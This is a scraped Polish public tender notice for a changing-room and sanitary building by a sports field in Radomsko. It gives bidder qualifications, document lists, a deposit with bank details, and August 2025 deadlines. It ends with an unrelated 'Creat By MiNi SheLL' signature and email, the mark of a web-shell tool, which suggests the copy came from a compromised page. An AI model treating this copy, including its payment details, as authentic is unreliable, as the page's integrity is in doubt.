Dot.zdolności technicznej lub zawodowej Określenie warunków:<br/>5.4.1)wymagane jest posiadanie wiedzy i doświadczenia, tj. warunek zostanie spełniony, jeżeli Wykonawca wykaże, że<br/>wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, co najmniej jedną robotę budowlaną (zamówienie – umowę) polegajacą na budowie budynku<br/>kontenerowego, wraz z<br/>wykonaniem co najmniej instalacji sanitarnych i elektrycznych o wartości nie mniejszej niż 50 000,00 zł netto wraz z<br/>podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane,<br/>oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty,<br/>UWAGA: Zamawiający uzna w/w warunek za spełniony także, jeżeli Wykonawca wykaże, że wykonał wymagane<br/>zamówienie w formule dostawy z montażem.<br/>5.4.2)dysponuje osobami zdolnymi do wykonania zamówienia tj. co najmniej:<br/>a) osobą, która pełnić będzie funkcję Kierownika budowy posiadającą uprawnienia do kierowania robotami budowlanymi w<br/>specjalności konstrukcyjno-budowlanej co najmniej w ograniczonym zakresie<br/>b) osobą, która pełnić będzie funkcję Kierownika robót posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych co najmniej<br/>wograniczonym zakresie<br/>c) osobą, która pełnić będzie funkcję Kierownika robót posiadającą uprawnienia do kierowania robotami budowlanymi w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i<br/>kanalizacyjnych co najmniej w ograniczonym zakresie<br/>określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane(t.j. Dz.U. z 2025 r. poz. 418) i rozporządzenia Ministra<br/>Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych<br/>funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831 ) lub odpowiadające im uprawnienia, które zostały wydane<br/>na podstawie wcześniej obowiązujących przepisów upoważniające do kierowania robotami budowlanymi w zakresie<br/>wymaganym do realizacji niniejszego zamówienia lub ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych<br/>architektów oraz inżynierów budownictwa (tj. Dz. U. z 2023r. poz. 551 ze zm.) oraz ustawy z dnia 22 grudnia 2015 r. o<br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2023 r.<br/>poz. 334 ze zm),<br/>Uwaga: Dopuszcza się możliwość, aby jedna osoba pełniła jednocześnie więcej niż jedną funkcję <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na wezwanie<br/>Zamawiającego, Wykonawca zobowiązany jest złożyć następujące oświadczenia lub dokumenty, w celu potwierdzenia braku<br/>podstaw wykluczenia Wykonawcy z udziału w postępowaniu:<br/>1) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez zamawiającego – z wykorzystaniem wzoru stanowiącego dodatek nr 5a do<br/>SWZ.<br/>W/w oświadczenie w przypadku wspólnego ubiegania się o zamówienie przez wykonawców (dotyczy również wspólników spółki<br/>cywilnej) - składa każdy z Wykonawców osobno.<br/>2) W przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby na zasadach określonych w art. 118<br/>ustawy, Wykonawca zobowiązany jest złożyć oświadczenie wymienione w w pkt 10.3.1. ppkt 1 SWZ podmiotu udostępniającego te<br/>zasoby - z wykorzystaniem wzoru stanowiącego dodatek nr 5b do SWZ .<br/>W przypadku, gdy Wykonawca powołuje się na zasoby innych podmiotów, w/w oświadczenie, składa każdy z tych podmiotów</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)wykaz<br/>robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, wraz z podaniem ich rodzaju, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane,<br/>oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a<br/>jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - z<br/>wykorzystaniem wzoru określonego w dodatku nr 6 do SWZ,<br/>Uwaga :<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi wykonawcami,<br/>w/w wykaz, powinien dotyczyć robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>2) oświadczenie na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry kierowniczej wykonawcy - z<br/>wykorzystaniem wzoru określonego w dodatku nr 7 do SWZ.<br/>3) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów - w przypadku polegania przez Wykonawcę na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby - Wykonawca składa wraz z ofertą ten dokument – z możliwością wykorzystania wzoru<br/>stanowiącego dodatek nr 8 do SWZ.<br/>4) oświadczenie, z którego wynika, które roboty budowlane, usługi wykonają poszczególni wykonawcy – zgodnie z pkt 8.2 ppkt 6)<br/>SWZ - dołączyć do oferty w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - z wykorzystaniem wzoru<br/>stanowiącego dodatek nr 4 do SWZ,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca zobowiązany jest złożyć:<br/>1) wypełniony formularz ofertowy o treści zgodnej z określoną we wzorze stanowiącym dodatek nr 1 do SWZ ,<br/>2) pełnomocnictwo/-a - do reprezentowania odpowiednio wykonawcy, wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia publicznego, podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy, określające jego<br/>zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy lub tego podmiotu – Wykonawca składa wraz z<br/>ofertą ,<br/>3) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby - w przypadku<br/>polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby Wykonawca składa niniejsze oświadczenia<br/>wraz z oświadczeniami, o którym mowa w pkt 10.1 ppkt 2 i 3 SWZ - z wykorzystaniem wzorów stanowiących dodatki nr 2b i<br/>3b do SWZ.<br/>W przypadku, gdy Wykonawca powołuje się na zasoby innych podmiotów, w/w oświadczenia, składa każdy z tych podmiotów.<br/>Zamawiający w celu potwierdzenia braku podstaw wykluczenia wykonawcy mającego siedzibę lub miejsce zamieszkania<br/>poza granicami Rzeczypospolitej Polskiej, wymaga złożenia oświadczeń, o których mowa w pkt 10.1 oraz 10.3.1 SWZ.<br/>Uwaga do SEKCJI V-KWALIFIKACJA WYKONAWCY- wykluczenie Wykonawcy na podstawie art. 108 ust. 1, art. 109 ust. 1<br/>pkt 4 ustawy Pzp i zgodnie z art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego(t.j. Dz. U. z 2024 r.<br/>poz. 507 z zm.)-szczegóły w SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta musi być zabezpieczona wadium w wysokości 1 600,00 zł (słownie: jeden tysiąc sześćset złotych 00/100),<br/>2. Wadium musi być wniesione przed upływem terminu składania ofert wskazanym w pkt 16.2 SWZ.<br/>3. Wykonawca może wnieść wadium w jednej lub kilku następujących formach:<br/>1) pieniądzu, przelewem na rachunek bankowy Zamawiającego w PKO Bank Polski S. A.<br/>Nr rachunku: 59 1020 3352 0000 1302 0265 3475<br/>z dopiskiem: Wadium - „Budowa budynku zaplecza szatniowo – sanitarnego przy boisku sportowym przy ul. Kukuczki w<br/>Radomsku” – etap I<br/>Uwaga:<br/>Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku Zamawiającego.<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy.<br/>5. Jeżeli wadium zostanie wniesione w formie, o której mowa w pkt 12.3 ppkt 2-4 wówczas Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej wystawiony na rzecz Zamawiającego (przed<br/>upływem terminu określonego w pkt 16.2 SWZ).<br/>Dokument ten musi zachować ważność przez okres związania ofertą.<br/>W/w dokument musi zawierać w swojej treści oświadczenie poręczyciela lub gwaranta, że zobowiązuje się on do<br/>nieodwołalnej i bezwarunkowej wypłaty wadium na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty.<br/>Tym samym, wadium musi zabezpieczać ofertę w sposób dający Zamawiającemu pewność pełnego zaspokojenia jego<br/>roszczeń zarówno co do ich maksymalnego zakresu, jak również bezwarunkowej i nieodwołalnej ich realizacji na pierwsze<br/>pisemne żądanie wzywające do zapłaty, w przypadku wystąpienia okoliczności ustawowych uprawniających do zatrzymania<br/>wadium.<br/>6. Jeżeli wadium zostanie wniesione w pieniądzu - przelewem, na poleceniu przelewu należy wpisać: „Wadium – „Budowa<br/>budynku zaplecza szatniowo – sanitarnego przy boisku sportowym przy ul. Kukuczki w Radomsku – etap I ”<br/>7. Zamawiający będzie dokonywał zwrotu lub zatrzymania wadium zgodnie z art. 98 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (w ramach oferty wspólnej).Wszelka korespondencja<br/>prowadzona będzie przez Zamawiającego wyłącznie<br/>z Pełnomocnikiem, przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl link<br/>prowadzący bezpośrednio do widoku postępowania na Platformie e-Zamówienia: w pkt 3.1 ogłoszenia o zamówieniu.<br/>2.Oferta Wykonawców, o których mowa w pkt 8.1 SWZ powinna spełniać następujące wymagania:<br/>1) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego;<br/>2) pełnomocnictwo powinno być załączone do oferty i zawierać w szczególności wskazanie:<br/>a) postępowania o zamówienie publiczne, którego dotyczy;<br/>b) wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem<br/>adresu siedziby;<br/>c) ustanowionego Pełnomocnika oraz zakres jego umocowania;<br/>3)W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o których mowa w pkt 10.1 ppkt4<br/>(art. 125 ust. 1) SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu<br/>4)W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi , do realizacji których te zdolności są wymagane.<br/>5) Wykonawcy wspólnie składający ofertę, dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>usługi wykonają poszczególni wykonawcy. Wzór przedmiotowego oświadczenia stanowi dodatek nr 4 do SWZ.<br/>6) oświadczenia, o których mowa w pkt 10.3.1 ppkt 1 SWZ składa każdy z Wykonawców osobno;<br/>7)odniesieniu do warunków określonych w pkt 5.2 SWZ wymagania te muszą być spełnione wspólnie przez wykonawców<br/>składających ofertę wspólną (nie musi ich spełniać każdy z wykonawców składających ofertę wspólną osobno);<br/>3.Szczegółowe informacje w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany umowy. Postanowienia dotyczące dopuszczalnych zmian umowy, zostały<br/>określone we wzorze/projekcie umowy stanowiącej dodatek nr 9 do SWZ oraz w art. 455 ust. 1 pkt 2, 3, 4 ustawy oraz<br/>art.455 ust. 2 ustawy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia, dostępnej pod adresem: https://ezamowienia.gov.pl link prowadzący bezpośrednio do widoku postępowania na Platformie EZamówienia podany w pkt 3.1 Ogłoszenia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-11 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamówienie jest realizowane w ramach 8 Edycji Budżetu Obywatelskiego 2024 pn. &#34;Zaplecze szatniowo – sanitarne przy boisku na ul. Kukuczki&#34;

Creat By MiNi SheLL
Email: jattceo@gmail.com